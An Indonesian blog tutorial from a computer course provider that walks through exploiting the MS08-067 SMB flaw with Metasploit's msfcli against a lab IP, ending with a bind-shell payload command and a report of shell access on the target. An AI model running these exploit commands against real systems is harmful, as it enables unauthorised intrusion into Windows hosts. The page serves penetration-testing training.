SMB Service Exploit dengan Metasploit Command Line (MSFCLI)

Written by Edusoft Center on September 11, 2013. Posted in Blog

MSFCLI hampir mirip dengan msfconsole, Command Line Interface (CLI) ini menyediakan berbagai modul yang dapat digunakan pada suatu kasus. Namun, MSFCLI ini tidak memiliki beberapa fitur seperti halnya dengan msfconsole.
Untuk mengakses msfcli (pada Backtrack 5 R3) silakan klik Backtrack -> Exploitation Tools -> Network Exploitation Tools -> Metasploit Framework -> Msfcli atau gunakan terminal untuk menjalankan perintah berikut:

# msfcli -h

1 300x206 SMB Service Exploit dengan Metasploit Command Line (MSFCLI)

Kita akan mengambil contoh sederhana dari penggunaan msfcli ini, yaitu dengan mengeksploitasi
ms08_067_netapi. Exploit ini akan mengeksploitasi port smb yang terbuka. Smb port ini biasa digunakan untuk layanan sharring folder, aplikasi dan perangkat lain (seperti printer, scanner, dll)

Untuk melihat opsi apa yang harus dimasukkan pada operasi msfcli
kita bisa menggunakan opsi “O”

2 300x206 SMB Service Exploit dengan Metasploit Command Line (MSFCLI)

msfcli windows/smb/ms08_067_netapi O

Opsi “P” ini digunakan untuk melihat apa payload yang mungkin bisa
digunakan dalam mengeksploitasi ini.

31 300x219 SMB Service Exploit dengan Metasploit Command Line (MSFCLI)

msfcli windows/smb/ms08_067_netapi P

Terakhir adalah setting IP target dengan parameter RHOST, lalu pilih payload yang sesuai dan eksekusi exploit.

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.12 PAYLOAD=windows/shell/bind_tcp E

4 300x211 SMB Service Exploit dengan Metasploit Command Line (MSFCLI)

# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.12 PAYLOAD=windows/shell/bind_tcp E

Seperti yang terlihat, kita telah memperoleh akses shell lokal untuk mesin target setelah menetapkan parameter RHOST dan payload. Ini membuktikan bagaimana mudah dan efisiennya penggunaan MSFCLI untuk pengujian penetrasi dengan cepat.

Tutorial Lain

Tags: , , , , , , , , , , , , , , ,

Trackback from your site.

Share This Post To :

Edusoft Center

Edusoft Center merupakan lembaga yang fokus pada bidang IT terutama pada Kursus Komputer Profesional. Berlokasi di Solo / Surakarta dan dengan slogan “Start Here. Go Anywhere” diharapkan ilmu yang didapat pada kursus kami dapat diterapkan untuk mempermudah dan menunjang pada semua lini kegiatan yang dilakukan. "Selamat datang di Edusoft Center, Kursus Komputer di Solo"

Leave a comment

Jika anda membutuhkan info lebih lanjut atau ingin mengetahui jadwal kursus, silakan hubungi kami,

Call / SMS :

0896 987 12224


Call / SMS / WA :

08180 4542 586


Email:
[email protected]